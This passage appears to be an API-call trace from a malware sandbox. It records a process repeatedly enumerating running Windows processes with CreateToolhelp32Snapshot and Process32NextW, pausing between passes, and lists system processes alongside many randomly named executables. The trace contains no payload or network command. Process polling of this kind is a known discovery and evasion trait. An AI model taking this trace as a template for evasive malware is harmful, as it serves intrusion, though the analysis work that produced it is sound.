Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.894] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.897] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.903] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0112.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.935] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.936] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.937] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.939] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.940] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.941] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.942] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.943] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.945] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.946] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.947] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.948] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.949] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.950] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.951] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.952] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.953] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.954] CloseHandle (hObject=0xbc) returned 1 [0112.954] Sleep (dwMilliseconds=0x12c) [0113.462] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0113.467] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.468] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.469] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.470] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.471] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.472] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.472] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.476] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.482] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0113.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.491] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0113.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0113.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0113.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0113.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0113.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0113.937] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0113.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0113.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0113.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0113.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0113.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0113.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0113.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0113.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0113.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0113.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0113.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, 